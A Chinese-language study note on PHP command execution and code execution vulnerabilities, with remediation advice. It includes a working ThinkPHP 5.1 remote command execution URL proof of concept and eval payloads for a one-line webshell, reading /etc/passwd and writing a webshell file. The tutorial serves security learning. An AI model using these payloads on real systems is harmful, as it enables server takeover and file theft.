本篇笔记摘自微信“黑白天”，如有侵权，联系删除

命令执行定义

当应用需要调用一些外部程序去处理内容的情况下，就会用到一些执行系统命令的函数。如PHP中的system，exec，shell_exec等，

当用户可以控制命令执行函数中的参数时，将可注入恶意系统命令到正常命令中，造成命令执行攻击。

形成原因

脚本语言优点是简洁，方便，但也伴随着一些问题，如速度慢，无法解除系统底层，如果我们开发的应用需要一些除去web的特殊功能时，就需要调用一些外部程序。带来方便的同时也存在威胁。

漏洞危害

继承Web服务程序的权限去执行系统命令或读写文件

反弹shell

控制整个网站甚至控制服务器

进一步内网渗透

代码执行与命令执行的区别

命令执行漏洞：相当于在cmd下敲命令，有一点像SSRF的利用方式

command1&command2 两个命令同时执行

command1&&command2 只有前面命令执行成功，后面命令才继续执行

command1;command2 不管前面命令执行成功没有，后面的命令继续执行

command1||command2 顺序执行多条命令，当碰到执行正确的命令后将不执行后面的命令

命令执行常用函数

1. System：system函数可以用来执行一个外部的应用程序并将相应的执行结果输出，

函数原型如下：string system(string command, int&return_var)

其中，command是要执行的命令，return_var存放执行命令的执行后的状态值。

2. Exec：exec函数可以用来执行一个外部的应用程序

string exec (string command, array&output, int &return_var)

其中，command是要执行的命令，output是获得执行命令输出的每一行字符串，

return_var存放执行命令后的状态值。

3.Passthru：passthru函数可以用来执行一个UNIX系统命令并显示原始的输出，

当UNIX系统命令的输出是二进制的数据，并且需要直接返回值给浏览器时，

需要使用passthru函数来替代system与exec函数。

Passthru函数原型如下：void passthru (string command, int&return_var)

其中，command是要执行的命令，return_var存放执行命令后的状态值。

4. Shell_exec：执行shell命令并返回输出的字符串，

函数原型如下：string shell_exec (string command)

其中，command是要执行的命令。

实战  TP5.1的命令执行漏洞

在url添加上poc

/index.php?s=index/\think\Container/invokeFunction&

function=call_user_func_array&vars[]=system&vars[1][]=dir 最后加命令

修复方案

1.尽量少用执行命令的函数或者直接禁用

2.参数值尽量使用引号包括

3.在使用动态函数之前，确保使用的函数是指定的函数之一

4.在进入执行命令的函数/方法之前，对参数进行过滤，对敏感字符进行转义

5.能使用脚本解决的工作，不要调用其他程序处理。尽量少用执行命令的函数，并在disable_functions中禁用

6.对于可控点是程序参数的情况下，使用escapeshellcmd函数进行过滤，对于可控点是程序参数值的情况下，使用escapeshellarg函数进行过滤

7.参数的值尽量使用引号包裹，并在拼接前调用addslashes进行转义

而针对由特定第三方组件引发的漏洞，我们要做的就是及时打补丁，修改安装时的默认配置。

代码执行漏洞

应用程序在调用一些能够将字符串转换为代码的函数(如PHP中的eval)时，没有考虑用户是否控制这个字符串，将造成代码执行漏洞。

很难通过黑盒查找漏洞，大部分都是根据源代码判断代码执行漏洞。

代码执行相关函数：

PHP: eval、assert、preg_replace()、+/e模式(PHP版本<5.5.0)

Javascript: eval

Vbscript：Execute、Eval

Python: exec

代码执行漏洞的利用：

1、一句话木马

${@eval($_POST[1])}

2、获取当前工作路径

${exit(print(getcwd()))}

使用菜刀

3、读文件

${exit(var_dump(file_get_contents($_POST[f])))}

f=/etc/passwd

使用post提交数值 f=/etc/passwd

4、写webshell

${exit(var_dump(file_put_contents($_POST[f], $_POST[d])))}

f=1.php&d=1111111

同样使用post

代码执行漏洞修复方案：

对于eval()函数一定要保证用户不能轻易接触eval参数或者用正则严格判断输入的数据格式。

对于字符串一定要使用单引号包裹可控代码，并且插入前进行addslashes

对于preg_replace放弃使用e修饰符.如果必须要用e修饰符，请保证第二个参数中，对于正则匹配出的对象，用单引号包裹。